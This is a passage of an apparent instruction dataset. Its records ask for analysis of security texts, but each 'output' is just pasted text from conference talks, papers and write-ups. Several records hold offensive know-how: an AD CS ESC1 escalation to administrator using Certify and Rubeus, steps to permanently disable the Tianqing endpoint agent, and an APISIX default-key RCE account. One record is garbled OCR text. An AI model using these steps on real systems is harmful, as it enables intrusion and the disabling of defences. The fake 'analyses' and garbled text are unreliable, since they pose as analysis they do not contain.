AMOUNT MODIFICATION REMOTE CODE EXECUTION HARDWARE OBSERVATIONS SECONDARY FACTORS Methods & Tools BLUETOOTH Methods & Tools Host Controller Interface (HCI) SOFTWARE BT PROFILES, GATT/ATT L2CAP LINK MANAGER PROTOCOL (LMP) BASEBAND BLUETOOTH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n性质 机器名 IP OS 域控 ADDC.apple.me 192.168.10.200 Microsoft Windows Server 2012 R2 Datacenter 6.3.9600 暂缺 Build 9600 x64 证书 服务 CA.apple.me 192.168.10.202 Microsoft Windows Server 2012 R2 Datacenter 6.3.9600 暂缺 Build 9600 x64 域内 主机 Win7- PC.apple.me 192.168.10.210 Microsoft Windows 7 Ultimate 6.1.7601 Service Pack 1 Build 7601 x64 ESC1 的补充利用 测试环境说明 以域内主机普通域用户admin权限跳板 方法一certmgr.msc 运行-certmgr.msc-操作-所有任务-申请新证书 选择漏洞模版本文为 ESC1再配置 UPN. 最后导出证书 右键证书-所有任务- 导出私钥. 选择个人信息交换 成功导出证书最后使用 Rubeus 进行 ptt 方法二Certify.exe 利用起来就很简单了Certify.exe 能搞定 Certify.exe request /ca:\"CA.apple.me\\apple-CA-CA\" /template:ESC1 /altname:administrator 工具利用失败查看 Github 上的 Issues发现了解决方案 修改 CreateCertRequestMessage() 如下代码 修改 CreatePrivateKey() 编译重新运行 CX509CertificateRequestPkcs10 objPkcs10 = new CX509CertificateRequestPkcs10(); 改成 IX509CertificateRequestPkcs10 objPkcs10 = (IX509CertificateRequestPkcs10)Activator.CreateInstance(Type.GetTypeFromProgID(\" X509Enrollment.CX509CertificateRequestPkcs10\")); 注释掉 format 2 的代码(注释掉代码多多少少都有些不合适) private static IX509PrivateKey CreatePrivateKey(bool machineContext) { var cspInfo = new CCspInformations(); cspInfo.AddAvailableCsps(); var privateKey = (IX509PrivateKey)Activator.CreateInstance(Type.GetTypeFromProgID(\"X509Enrollment .CX509PrivateKey\")); privateKey.Length = 2048; privateKey.KeySpec = X509KeySpec.XCN_AT_SIGNATURE; privateKey.KeyUsage = X509PrivateKeyUsageFlags.XCN_NCRYPT_ALLOW_ALL_USAGES; privateKey.MachineContext = machineContext; privateKey.ExportPolicy = X509PrivateKeyExportFlags.XCN_NCRYPT_ALLOW_EXPORT_FLAG; privateKey.CspInformations = cspInfo; privateKey.Create(); return privateKey; } 将获取到的内容保存为 cert.pem 再使用 openssl 将得到的 cert.pem 进行转换 使用 Rubeus 进行 ptt效果如方法一一样 openssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLEARN HOW TO CONTROL EVERY ROOM AT A LUXURY HOTEL REMOTELY: THE DANGERS OF INSECURE HOME AUTOMATION DEPLOYMENT Jesus Molina @verifythentrust security@nomeames.com 1 Abstract The St. Regis ShenZhen, a gorgeous luxury hotel occupying the top 28 floors of a 100 story skyscraper, oers guests a unique feature: a room remote control in the form of an iPad2. The iPad2 controls the lighting, temperature, music, do not disturb light, TV, even the blinds and other miscellaneous room actions. However, the deployment of the home automation protocol contained several fatal flaws that allowed an arbitrary attacker to control virtually every appliance in the hotel remotely. I discovered these flaws and, as a result, was able to create the ultimate remote control. The attacker does not even need to be in the hotel - he could be in another country. This white paper discusses home automation and the anatomy of the attack: an explanation of reverse engineering of the KNX/IP home automation protocol; a description of the deployment flaws; blueprints on how to create an iPad Trojan to send commands outside the hotel; and, of course, solutions to avoid all these pitfalls in future deployments. 2 Introduction In Hollywood movies, cyberattacks end with shocking results that stun the audiences and ruin the movie for security researchers. Traffic halts in LA as Seth Green switches all lights to red in the Italian Job. The bad guy in Jurassic Park shuts down the electrical fences and the dinosaurs roam free. These epic attacks sound whimsical, but nowadays appear closer than ever with the advent of what people call the Internet of Things (IoT), a vision where every single electronic device is networked. 1 Figure 1: The view But if there was any doubt, imagine this scene in a James Bond movie. The bad guy and his minions guard the bomb detonator in a hotel suite. Time is running out, and Bond cannot access the room and fight the guards. All seems lost. Suddenly, his cell rings, and after grabbing it ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<location, date> <Location, date> Defcon Safe Mode // Aug 2020 Detecting Fake 4G Base Stations in Real Time Cooper Quintin - Senior Security Researcher - EFF Threat Lab Defcon Safe Mode With Networking 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Intro  Cooper Quintin  Senior security researcher  Has a toddler (dad jokes)  Former teenage phone phreak  EFF  Member supported non profit  Defending civil liberties  30 years  Threat lab <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Yomna! None of this research would have been possible without her hard work. This is as much her project as mine. Twitter: @rival_elf Actual photo of Yomna <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Technology that Targets At Risk People  Activists, human rights defenders, journalists, domestic abuse victims, immigrants, sex workers, minority groups, political dissidents, etc  Goals of this technology  Gather intelligence on opposition  Spy extraterritorially or illegally  Locate and capture  Extortion  Harass and intimidate  Stifle freedom of expression <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Jeff Bezos Can Afford a Security Team Cybersecurity and AV companies care about the types of malware that affects their customers (usually enterprise.) We get to care about the types of technology the infringe on civil liberties and human rights of at risk people. This guy is not at risk. <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Our Goals  Protect people  Broaden our communities` understanding of threats and defenses  Expose bad actors  Make better laws <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Project Dark Caracal Stalkerware <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What We are Going to Talk About Today  Cell-site simulators AKA Stingrays or IMSI Catchers  How they work  Previous efforts to detect them  A new method to detect them  How to fix the problem <", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n43 43 00205! w 7 ! 日程 1SQZPM w  uu    o  o <D57klo  o q&7 1U9ZQRMOQ6aeeUZS  o BQVQO s3Ma_Qmsmm & 9[Dmm  BB3o n x <D57klo  xo nm m  o n  o n nC9=  no xtn qs  o  o kl  3o   9ZQX  EC2&  o  C4BoECB2UZU<UQC4B    o   kl  o  <D5oQZ1U9ZQRMOQ  7C=oQZ2C3  o  ENaZa)<DC  o  7kl  MZSM[[=[NUXQ4Q_W[[o  mh  )  78I9ZQX1[d(I+( m78I  7B1=  &75==3  wEC2& 7kl  E2[MPo  78I9ZQX1[d(I+&( m78I  7B1=  )75==3  wEC2&D7  (F 7k&l  ECB2UZUo  -=8e )78e  o()=8e  oP2  EC2& 7kl  o  7k(l  o  (F&1q <D57 <D57 <D5n7C=Xa[C4B <D57kl  o  s53OLQ>2LC1Om ==5m53mQ>[PQ2  1MOTBQ]aQ_1MOTBQVQO d->Qc[WRMUXaQ d  D44<D5  19D4<D5D4m mt19xD4 mt   oM_Q1ED>B1>4 HB5Cmm<D5 ==5RQQ4UMQQ <D57kl  <D57C=   o  E9    1  &77  ms  o  k1FCQl  <D5kM_Qm1ED>mB1>4mHB5Cl  E=DCk9m3m1ED>mB1>4mHB5Cl  6Q[3QXXo  9CQOF>  6Q[3QXXCQ7G  6Q[3QXX==5C7C>  7BH9Ho  7D3   6Q[3QXX 6Q[3QXXkl  xo  7C=o8>2  D4C34=1o8>2&&8>  D4<D5ox2C+ 6Q[3QXXkl  xo  E1(E1+)E1+&(  QUO[&+QUO[&+ 6Q[3QXXk&l  xo  QUO[&)+ &7E=DC &76Q[OQXX DB)6Q[3QXX DB)  k35l  1a[3[ZRUSaMU[ZCQbQk13Cl35 Ø ØC[[R  8DDC}  o35m6UcMQ  6Q[3QXXs  13C9CQO 7&77m zoE7G+ B[[6Q[3QXX  &776Q[3QXX CQ7GC9=6Q[3QXX6UcMQ  [[  9CQO   x  m B[[6Q[3QXX  p  3   C5775B:<UZW  B[[6Q[3QXX  2ECUMQ  :D17aXM[  >1>46XM_T DC() :D176Q[3QXX   x E1BD6Q[3QXX    >1>46XM_T  6UcMQ  o oC9= & B[[6Q[3QXX  DB)o7QZUQ13CQZ13C Øq6UcMQ6UcMQ Øq  941[  QZ34  2UZcMXW    k9m3m1ED>mB1>4mHB5Clk M_Qm1ED>mB1>4mHB5Cl  o  6Q[3QXX  6Q[3QXXk8Q>27Gl  6Q[3QXX511151C9=  9CQO  6Q[3QXXqkl  mC7C>==5 6Q[3QXX  6Q[3QXXqs  x~C9=m_[ZSCcMZ  EC9=m3C3 <D5  om  19x==5m1F m   CCC97DB1>v  7BHo7BHB[MUZS5dOTMZSQ  9Ho95dOTMZSQ  7BH9Hxwm  7BH 1F  CC-CQZP1aT9ZR[CQZP9PQZURUOMU[Z  7BH-C7C>3[ZQdBQ]aQ_  9H4UMQQ-1aTQZUOMU[Z9ZR[MU[ZBQ]aQ_  9QPUMQBQ_[Z_QQRQQP q7BH GTP echo request: 7BHi 77C>kl GTP echo response: 7BHi 77C>kl 7BHi t77C> 7BHi C7C>  t77C>  C7C>3[ZQdBQ]aQ_m1F  t==5  7BHo77C>==5m  r7BH[[m  m7BH 4UMQQ  k9CQOD<Cls  {ms  C3D  1XUOMU[Z9PQZURUQ )( 9H4UMQQ  RQQ4UMQQ  s  C)Mo==58CC  1aTQZUOMU[Z9ZR[MU[ZBQ]aQ_1Z_cQm9QPUMQ BQ_[Z_QQRQQP  8CC 5EDB1>FQO[--/.1FTQMPQ-(0  J9Q>aNQK  fB1>4g  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAmateur Digital Archeology Matt Joyce \"In the streets of Hau-kai, we wait Night comes, winter descends The lights of the world grow cold And, in this three-hundredth year From the ascendancy of Bilat He will come who treads the dawn Tramples the sun beneath his feet And judges the souls of men He will stride across the rooftops, And he will fire the engines of God. - The Engines of God, Jack McDevitt http://pgsc.space/ Hacker is just another word for amateur. Three young IS militants lie dead on the banks of the River Tigris. What if the story stopped there?  Quentin Sommerville, Riam Dalati for BBC News They left behind personal photos and documents which reveal the extraordinary story of their private lives. This is a great example of how digital forensics can help produce valuable primary and secondary sources. http://www.bbc.co.uk/news/resources/idt-sh/is_fighters  US National Archive / History in the Raw Documents--diaries, letters, drawings, and memoirs--created by those who participated in or witnessed the events of the past tell us something that even the best-written article or book cannot convey. The use of primary sources exposes students to important historical concepts. First, students become aware that all written history reflects an author's interpretation of past events. Therefore, as students read a historical account, they can recognize its subjective nature. Second, through primary sources the students directly touch the lives of people in the past. Further, as students use primary sources, they develop important analytical skills. Adam at NYC Resistor has this to say about siphoning the brains out of EEPROMs. Step zero: Find a board with a brain. -phooky Concerning amateur archeology Part of being an amateur is recognizing your limitations. Part of being an amateur is being dumb enough not to. Some of you are going to be thinking this during this talk. This is Def Con. We are way more Lando Calrissian, than we are Professor Jones. The National Air a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# TheTarget * Category: Misc. * 100 Points * Solved by the JCTF Team ## Description > EZ-PZ-LEMON-SQUIZZY A file was attached. ## Solution Let's check the attached file: ```console root@kali:/media/sf_CTFs/bsidestlv/TheTarget/TheTarget# file TheTarget TheTarget: Extensible storage engine DataBase, version 0x620, checksum 0xbb95e8e9, page size 8192, Windows version 6.3 ``` It's a 75MB [ESE DB](https://en.wikipedia.org/wiki/Extensible_Storage_Engine). We can use [libesedb](https://github.com/libyal/libesedb) to work with it. We just need to download the latest version from github, and call `./configure` and `make` to built it from sources. (On Windows, we can use [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html)). First, we can check what are the tables contained within the DB: ```console root@kali:/media/sf_CTFs/bsidestlv/TheTarget/TheTarget# ./libesedb-20200418/esedbtools/esedbinfo TheTarget | grep \"Table: \" Table: 1 MSysObjects (2) Table: 2 MSysObjectsShadow (3) Table: 3 MSysObjids (6) Table: 4 MSysLocales (7) Table: 5 datatable (8) Table: 6 hiddentable (185) Table: 7 link_history_table (186) Table: 8 link_table (194) Table: 9 quota_rebuild_progress_table (207) Table: 10 quota_table (208) Table: 11 sdpropcounttable (209) Table: 12 sdproptable (210) Table: 13 sd_table (214) ``` `datatable` sounds the most interesting, so let's dump it: ```console root@kali:/media/sf_CTFs/bsidestlv/TheTarget/TheTarget# ./libesedb-20200418/esedbtools/esedbexport -T datatable TheTarget esedbexport 20200418 Opening file. Database type: Unknown. Exporting table 5 (datatable). Export completed. ``` Now we just search for the flag format: ```console root@kali:/media/sf_CTFs/bsidestlv/TheTarget/TheTarget/TheTarget.export# sed 's/\\x09/\\x00/g' datatable.4 | strings | egrep -i \"BSidesTLV(2020)?{\" BSIDESTLV2020{ThisGoesDeeper} ``` (Note: For some reason, the export uses `0x09` as a filler character, we replace it with `0x00` for convenience).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2 SLIDE about me some call me a one trick pony, others call me passionate  mad scientist hacker who likes to meddle with hardware and software.  particularly obsessed with wireless.  degree in computer science from Southern Utah University  loves include:  web application pentesting  wireless monitoring and tracking  reverse engineering  creator of the #WiFiCactus  Kismet cultist  Runner 3 SLIDE history background Wardriving got popular in the early 2000s as a way for people to find open networks to piggyback on [1]. Equipment was pretty expensive and limited. 2000 The number of devices that are connected over wireless has increased exponentially since the early 2000s and make Wardriving, Netstumbling and Wireless Monitoring more exciting than ever. 2015 Warwalking with a single-board computer in my backpack for Defcon 23. Collected data on 2 channels at a time. Backpack Test Project 2016 Planted 12 monitoring boxes around the conference for Defcon 24. 48 total wireless radios scanning at the same time. Project Lana 2017+ 25 Hak5 Pineapple Tetras that cover 50 total channels in 2.4 and 5 GHz. Over 3 hours of battery life. Weighs ~35 lbs. #WiFiCactus [1] https://en.wikipedia.org/wiki/Wardriving 4 SLIDE WiFiCactus but why though? Understand the FUD Nearly every person has heard that DEFCONs network is the most dangerous in the world. I wanted to know why and how it is so dangerous. Understanding is the first step to protecting yourself. The Connected World Everything is connected now and usually with more than 1 radio. This makes for amazing data. Whether its your phones mobile hotspot to the SMART THINGS (IoT) need to be connected and we gotta catch them all! Verify Then Trust Do you trust that security, software and APIs are being done correctly when communicating over a network? Do you know if your favorite app uses encryption? By scanning yourself you can verify how secure things are. 5 SLIDE data captured got data? 0 200 400 600 800 1000 1200 2015 2016 2017 2018-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDmitry Kurbatov Sergey Puzankov Vladimir Kropotov Fractured Backbones  Incidents Detection and Forensics in Telco Networks ptsecurity.com About us Joint research of Incident Response and Telco Security Teams Introduction Technologies behind telco networks Чем мы пользуемся сегодня и на основе каких технологий это работает Types of Incidents  Subscriber location tracking  Call interception (wiretapping)  SMS interception and spoofing  DoS, including balance DoS  Other Fraudulent activities Phone number +7 777 5555555 GPS location Incidents statistics. Major threats Service Disruption Data Leakage Fraud Percentage of vulnerable networks Incidents statistics. Data leakage Subscribers Balance Disclosure Terminating SMS Interception Subscriber Location Discovery Voice Call Interception Subscribers Data Leakage Percentage of vulnerable networks Incidents statistics. Fraud Terminating Call Redirection Money Transfer via USSD Subscriber Profile Change Originating Call Redirection Percentage of vulnerable networks Incident victims  Mobile operator subscribers  Mobile operator  Other Mobile operators and their subscribers  Third parties (often Banks and Their clients) Prerequisites of attacks  Internal intruder or Staff initiated attacks  Level0 (almost) Kiddies - attacks that not require deep technical knowledge SMS fraud as preliminary stage of malware based attacks Fraud with social engineering (direct target is victim) Proxified fraud with social engineering  Level1(Locally initiated) - attacks that require technical knowledge about Radio Access Network protocols IMSI Catcher Bluetooth Calls and SMS from the subscriber located nearby Level2 (Global impact) - attacks that require technical knowledge about telco infrastructure and protocols Lightweight scenarios (Level0) Kiddies fraud examples Typosquatting works well even here http://journal.tinkoff.ru/declined/ Not legit Legit You received 30000 RUB, please follow the link for confirmation Purchase. Card *1234. Ammount 60", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n强杯 WriteUp By Nu1L AuthorNu1L Team 强杯 WriteUp By Nu1L Pwn yakagame easychain1 house of cat Reverse find_basic easyre deeprev GameMaster easyapk Web uploadpro babyweb easylogin easyweb crash Crypto Factor myJWT Lattice Misc 谍影重重 强先锋 rcefile polydiv devnull WP-UM AVR Pwn yakagame llvm void a000(int a); void a001(int a); void a002(int a); void a003(int a); void a004(int a); void a005(int a); void a006(int a); void a007(int a); void a008(int a); void a009(int a); void a010(int a); void a011(int a); void a012(int a); void a013(int a); void a014(int a); void a015(int a); void a016(int a); void a017(int a); void a018(int a); void a019(int a); void a020(int a); void a021(int a); void a022(int a); void a023(int a); void a024(int a); void a025(int a); void a026(int a); void a027(int a); void a028(int a); void a029(int a); void a030(int a); void a031(int a); void a032(int a); void a033(int a); void a034(int a); void a035(int a); void a036(int a); void a037(int a); void a038(int a); void a039(int a); void a040(int a); void a041(int a); void a042(int a); void a043(int a); void a044(int a); void a045(int a); void a046(int a); void a047(int a); void a048(int a); void a049(int a); void a050(int a); void a051(int a); void a052(int a); void a053(int a); void a054(int a); void a055(int a); void a056(int a); void a057(int a); void a058(int a); void a059(int a); void a060(int a); void a061(int a); void a062(int a); void a063(int a); void a064(int a); void a065(int a); void a066(int a); void a067(int a); void a068(int a); void a069(int a); void a070(int a); void a071(int a); void a072(int a); void a073(int a); void a074(int a); void a075(int a); void a076(int a); void a077(int a); void a078(int a); void a079(int a); void a080(int a); void a081(int a); void a082(int a); void a083(int a); void a084(int a); void a085(int a); void a086(int a); void a087(int a); void a088(int a); void a089(int a); void a090(int a); void a091(int a); void a092(int a); void a093(int a); void a094(int a); void a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHVV 之不需要密码永久退出 LM 天擎 1. 又要到护网了,还记得去年护网客户问我天擎退出密码是多少,说想安装软件 安装不上去 2. 我心想,好家伙,这谁家的软件这么流氓 3. 不需要逆向这么麻烦的方法其实很简单重启之后进入安全模式这个时 候天擎是没有启动的 4. 然后进入天擎的安装目录,这个时候天擎的安装目录名称是 Tianqing 5. 然后把目录修改成 Tianqing6666 6. 最后重启进入正常模式,因为目录名字变了,天擎的自启动也就失效了. 7. 如果后面用到的时候手动启动 TQSafeUI.exe 就可以了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEXTENSION-LAND EXPLOITS AND ROOTKITS IN YOUR BROWSER EXTENSIONS BARAK STERNBERG // DEFCON 2021 ABOUT ME  Barak Sternberg (@livingbeef)  Senior Security Researcher, Previously Author @ SentinelOne Labs.  Hacking smart-devices for fun and profit // DC28 IoT Village.  BSc & MSC in CS on algorithms (bioinfo) from TAU.  Focus from vulnerability-research (IoT, embedded devices, Linux and web apps) to analyze malwares in the wild.  DJ & Party Lover (mixcloud.com/barak-sternberg) MOTIVATION  More than 2 million extensions in webstores - attackers develop malicious ones & exploit.  Why Extensions?  More permissions (easy uXSS to any origin)  Controlling you entire browser & more  Cross-platform  works on any desktop/OS  Easier to develop  JS-malware SYLLABUS 1. Intro to chrome-extensions 2. Extensions communication 3. Exploiting Zotero - Jumping from one chrome-app to chrome-extension. 4. Exploiting Vimium  from PRNGs to uXSS. 5. Developing & Implanting an \"Extension- Rootkit 6. Implanting a rootkit inside \"good\" extensions EXTENSIONS ANATOMY  THE BASICS  Content-Scripts  Extensions frontend:  Loaded inside matching sites (sites extension works for).  Runs in a special VM context (its own vars and private-world).  Accessible to site DOM.  Background-Scripts  Extensions Backend:  Run once in a special dedicated process.  Access to more APIs.  Persistent  non-site dependent.  Extension-Dir - %LocalAppData%\\Google\\Chrome\\User Data\\Default\\Extensions\\EXTENSION_ID\\  Extension-Manifest - Manifest.json (the manifest.xml of extensions)  Extension-Signature - Gets verified & checked at run-time. MANIFEST ANATOMY 1 2 3 COMMUNICATING IN EXTENSION-LAND  For Example, lets say we go to https://google.com  For every extension the following interactions are created. *Picture Credit for Attacking Browser Extensions // Nicolas Golubovic CONTENT-SCRIPTS?  Example: Ad-Blocker wants to remove ad-iframes from your page.  How? It inspects the dom and remove them.  Example code: Let el = document.q", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecure Tokin & Doobiekeys: How to roll your own counterfeit hardware security devices @sercurelyfitz, @r00tkillah $whoami Michael* (@r00tkillah) has done hard-time in real-time. An old-school computer engineer by education, he spends his days championing product security for a large semiconductor company. Previously, he developed and tested embedded hardware and software, dicked around with strap-on boot roms, mobile apps, office suites, and written some secure software. On nights and weekends he hacks on electronics, writes Troopers CFPs, and contributes to the NSA Playset. * Opinions expressed are solely my own and do not express the views or opinions of my employer.  Lectrical Nginear by education  10+ years of fun with hardware  silicon debug  security research  pen testing of CPUs  security training  Applied Physical Attacks Training:  X86 Systems  Embedded Systems  Hardware Pentesting  Own white shoes full of LEDs whoami? Joe FitzPatrick @securelyfitz joefitz@securinghardware.com Wouldnt it be cool if... We had a magical device that  Encrypted things for us  Authenticated things for us  Authenticated us to others  Solved all our insecurities Wouldnt it be cool if... That magical device  Fit in the palm of our hand  Was easy to use  Only cost a few bucks Wouldnt it be lame if... This turned into a sales pitch for hardware security devices? These are all improvements... But theyre not magic. Classic Hardware Threat Modeling  Common attackers:  Evil maid  Supply chain  and End user  Common vectors:  external ports  internal pins  counterfeit chips  intrusive techniques Dont attack the standard. Attack the implementation.* *Does not refer to the hardware implementation Refers to the use cases and common scenarios RSA Securid Token First, whats the real easiest way in? an extremely sophisticated cyber attack Hardware can be hard. Hardened Hardware is Harder ? Common Assumptions:  The computer may be pwnd, but the token is separate  The master key inside the chip is", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前 如有技术交流或渗透测试/代码审计/SRC漏洞挖掘/红队向综合培训 或 红蓝对抗评估/安全产品研发/安全服务需 求的朋友 欢迎联系QQ/VX 547006660 https://github.com/J0o1ey/BountyHunterInChina 重之我是赏猎系列欢迎家点个star 0x02 缘起 早上打开微信聊群偶然间发现新上了家SRC 新上的SRC般都是细嫩的处未经万骑得也更加容易我们来探究竟 0x03 资产搜集到默认秘钥被改 穷尽 简单标的cert信息收集了下络空间的资产 发现了标不少的域名都采短横线命名法般来说这种命名法便于分辨开发测试产环境还是蛮 多的 Wri t t en by J 0o1ey: 547006660 总结了下常的开发测试产环境域名中常词如下 随后从资产列表中找到了个看起来像管理api接的域名进访问 根据回显结合之前多年的测试经验推断此处使了Apache Apisix 之前复现过Apache Apisix默认秘钥添加恶意路由导致的RCE漏洞此处直接准备试 发现直接寄了标产环境的api把这个默认的key给改掉了导致没法创建恶意路由 uat test dev pre pr pro ... Wri t t en by J 0o1ey: 547006660 难道就这样结束了那显然不符合我们的格 0x04 理顺思路-发现隐藏的测试环境资产 刚刚我们在进资产搜集时已经发现了标域名的统命名特点 那么我们完全可以借助FUZZ域名来搞出点花尝试发掘隐藏资产 最终成功发现按照标的标的四处产环境的隐藏资产 ./ffuf -w domain_test -u https://gateway-xxx-xxx-FUZZ.xxx.com -mc 404 -t 1 Wri t t en by J 0o1ey: 547006660 0x05 测试环境默认key的原罪到RCE 随后在下四个隐藏域尝试默认key添加恶意lua路由发现均成功 添加恶意路由后就是平川直捣了 Wri t t en by J 0o1ey: 547006660 标是运在k8s上的掐指算应该是测试环境了默认key的镜像运维也没做修改导致了RCE的锅 交完四处命令执奖励晚上吃鸡蛋肠粉加根肠 0x06 技术点总结 结合标域名命名特点发现隐藏的开发测试环境资产 完成新突破 Wri t t en by J 0o1ey: 547006660", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nINTERSTATE: A Stateful Protocol Fuzzer for SIP Thoulfekar Alrahem, Alex Chen, Nick DiGiussepe, Jefferey Gee, ShangPin Hsiao, Sean Mattox, Taejoon Park, Albert Tam, Ian G. Harris Department of Computer Science University of California Irvine Irvine, CA 92697 USA harris@ics.uci.edu Marcel Carlsson Fortconsult Tranevej 1618 2400 Copenhagen NV Denmark mc@fortconsult.net Fuzzing Basics INVITE sip:marXXXXXXXXXXXXXXXXXXXXXXXXXXconi@radio.org SIP/2.0 Via: SIP/2.0/UDP lab.test.org:5060;branch=ziuh2w Max-Forwards: 70 To: G. Marconi <sip:Marconi@radio.org> From: Nikola Tesla <sip:n.tesla@test.org>;tag=98767 Call-ID: 123456789@lab.test.org Cseq: 1 INVITE Transmit a sequence of messages to a server, attempting to break it Apply fuzzing functions to message fields to reveal vulnerabilities Typical Fuzzing Functions Buffer Overflow - Make a field very long to force buffer overflow Command Injection - Insert shell metacharacters to see if string is passed to a shell SQL Injection - Insert SQL reserved word to see if string is used to build an SQL query Session Initiation Protocol (SIP) SIP Client SIP Server INVITE 180 Ringing 200 OK ACK BYE 200 OK MEDIA SESSION 100 Trying Used to start, end, and modify communication sessions between VOIP phones SIP does not transfer media (audio/video) User Agent Client (UAC) - Initiates call - Sends Request Messages User Agent Server (UAS) - Receives call requests - Send Response Messages We do not consider other SIP entities, proxies, registrar servers, etc. We are fuzzing the UAS, fuzzer is a client Previous Work, SIP Fuzzers SNOOZE Fuzzer SNOOZE: toward a Stateful NetwOrk prOtocol fuzZEr, G. Banks, M. Cova, V. Felmetsger, K. Almeroth, R. Kemmerer, G. Vigna, Information Security Conference, 2006 Protocol state machine is used, XML-based description Fuzzing scenario defines message sequence, what to fields to fuzz, what fuzzing primitives to use Fuzzing scenarios must be developed manually Previous Work, SIP Fuzzers PROTOS Suite Free version: htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntimes === 显示进程累计时间 ## 主要用途 - 打印出shell及其子进程累计使用的用户时间和系统时间 ## 返回值 总是返回成功 ## 例子 ```shell # 执行命令 times # 返回结果 0m0.037s 0m0.009s 0m0.010s 0m0.024s # 根据times(2)的man手册对应关系如下 # 用户时间 | 系统时间 # 子进程的用户时间 | 子进程的系统时间 ``` ### 注意 1. 该命令是bash内建命令相关的帮助信息请查看`help`命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBrowser Based Defenses - (c) 2010 All Rights Reserved 1 Browser Based Defenses Introducing x06d james@bluenotch.com Browser Based Defenses - (c) 2010 All Rights Reserved 2 The Problem: Re-Anonymizing You!  Overall State of the Web  Client/Browser issues  Hard to make public browsers secure  at least enough to keep the public safe  Server landscape  Many layers to secure  Portions of a served app tend to be clients of another site (see above)  Well put by RSnake and Jabras in De-Anonymizing You! (DEF CON 17)  x06p is POC for a Browser Based Defense  Goal : buy time for 6 days of pseudo protection Browser Based Defenses - (c) 2010 All Rights Reserved 3 Defending Technique: SARS!  Sanitize input to the Browser  Detect interesting code into the browser  Allow control of server content (ala noscript for <script>)  Anonymize the Browser  Make yourself look like everybody else  Make yourself look like a specific somebody  Randomize the Behavior  Create a generic history  Generate line noise  Sanitize output to the Server  Detect interesting code sent by the browser (ie. XSS)  Neuter interesting code (convert the code) Browser Based Defenses - (c) 2010 All Rights Reserved 4 Defeating Attacks on Input  Sanitize input to the Browser  Scan the HTTP Response for evil  Plug-ins like noscript already do this  Whitelisting is hard  Site content changes  Who is qualified to OK content?  Dare we vote on each <script> tag?  A public blacklist will help  Might as well live with signature detection shim Browser Based Defenses - (c) 2010 All Rights Reserved 5 Browser Tracking  panopticlick.eff.org  Some code borrowed from browserspy.dk and breadcrumbs  Headers  History  Fonts  Plug-ins Browser Based Defenses - (c) 2010 All Rights Reserved 6 Defeating Header Detection  Generalize every Request Headers except for the URL and HOST  Randomize parameters to increase noise  Change order of GET/POST parameters  Add benign parameters  Cookie Automation for privacy  Clear on browser open  Rewrit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Implementation of Implementation of Web Application Firewall Web Application Firewall OuTian < OuTian <outian@chroot.org outian@chroot.org> > 2 Introduction Introduction Abstract  Web 層應用程式之攻擊日趨嚴重而國內多 數企業仍不知該如何以資安設備阻擋仍在採 購傳統的 Firewall/IPS 因此本場次即對 Web Application Firewall( 以 下 簡 稱 WAF)之功能及實作方式作介紹 About OuTian  現任 敦陽科技 資安顧問  滲透測試服務與後續資安規劃  資安事件鑑識處理 3 Agenda Agenda Introduction to WAF General Web Vulnerabilities Functions Implementation Common Questions Evasion Conclusion Q & A 4 Introduction to WAF Introduction to WAF 5 Introduction to WAF Introduction to WAF What is WAF Why WAF Vendors Structure WAF v.s Network Firewall WAF v.s IPS 6 What is WAF What is WAF An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violation in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack. 7 Why WAF Why WAF Web AP 成為 顧客/駭客 共同入口  根據Gartner統計 成功的惡意攻擊中70% 都是針對 Web AP 8 既有的資安設備無法有效阻擋 既有的資安設備無法有效阻擋 9 SSL SSL 加密 加密IDS/IPS IDS/IPS也看不懂 也看不懂 Internet Corporate LAN Application Infrastructure IP Traffic HTTP HTTPS 合法使用者 網際網路駭客 來源 目的 服務 動作 Any Web Server 1 HTTP/S 合法接受 10 Web AP Web AP 安全來源的複雜性 安全來源的複雜性  複雜之 AP Source Code  開發者多數僅注重功能  類似的安全問題重複發生  其他引用來源所累 11 